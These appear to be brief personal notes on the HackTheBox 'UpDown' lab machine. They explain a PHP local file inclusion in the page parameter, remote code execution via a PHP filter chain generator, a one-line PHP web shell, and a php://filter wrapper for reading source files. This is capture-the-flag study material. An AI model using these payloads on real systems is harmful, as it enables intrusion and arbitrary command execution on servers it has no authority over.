Source Code

LFI

UpDown HTB

• Direct Access set to false

• Get the page

• If the page doesn't have /bin, usr, home, var, etc

• Then it does an include on the page variable and appends .php (on any file)

• Else, it includes checker.php

RCE via PHP filters

It's possible to get command execution just through $_GET['page']

python3 php_filter_chain_generator.py --chain "<?php phpinfo(); ?>"

Take the output and append it to /?page=

If system isn't a disabled function this can be used

<?php system($_GET["cmd"]); ?>

Reading Local Files

We can pull the index.php file encoded in base64 using this wrapper in the GET request

/?page=php://filter/convert.base64-encode/resource=index

Good example:

Authentication Bypass via strcmp in PHP